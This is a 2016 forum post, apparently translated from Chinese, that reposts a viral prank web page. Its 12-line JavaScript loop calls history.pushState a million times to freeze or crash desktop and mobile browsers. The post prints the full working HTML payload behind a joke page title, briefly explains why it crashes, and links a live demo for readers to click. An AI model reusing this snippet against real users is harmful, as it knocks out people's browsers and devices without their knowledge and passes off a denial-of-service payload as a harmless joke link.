|
|
Posted on 1/22/2016 11:36:39 AM
|
|
|
|
The cause of the incident is this, a foreign buddy Cyber Security posted such a tweet on Twitter:
This guy claims that if you use the above 12-line Javascrip{filter}t code, you can crash Firefox, Chrome, Safari browsers, and also make your iPhone restart and Android phone crash!
The full HTML code is as follows:
- <html>
- <head>
- <meta charset="utf-8">
- <title>谁点谁怀孕</title>
- </head>
- <body>
- 恭喜你,你已经怀孕了!
- <scrip{过滤}t>
- var total="";
- for (var i=0;i<1000000;i++)
- {
- total= total+i.toString();
- history.pushState(0,0,total);
- }
- </scrip{过滤}t>
- </body>
- </html>
If you are a PC user, after clicking on the link, the computer CPU memory is very likely to soar all the way until the browser crashes and freezes...
If you are a mobile (Android, iPhone) user, your browser will crash after clicking on the link! Clicking on the link on Weibo and WeChat will also crash.
Why does this happen? In this regard, I found an answer from a god named "Xiaomi" on Zhihu:
history.pushstate() is an API introduced by HTML5, pushState adds a specified URL to the browser history and stores the current history point. When i<100000, the total will be recorded in the browser history in a cyclical manner, and if it is repeated too much, the browser will not be able to bear it and will naturally crash.
Well, anyway, I can't even make up "hello world", so I don't understand it at all... In short, it's just right to blow up the sky!
If you want to try it, please click here: http://www.itsvse.com/demo.html
|
Previous:[Open Source] Wooyun Vulnerability Query Platform Source Code Plus Database asp.net VersionNext:Linux config/configure/Configure, make, make test/make check, sudo make in...
|
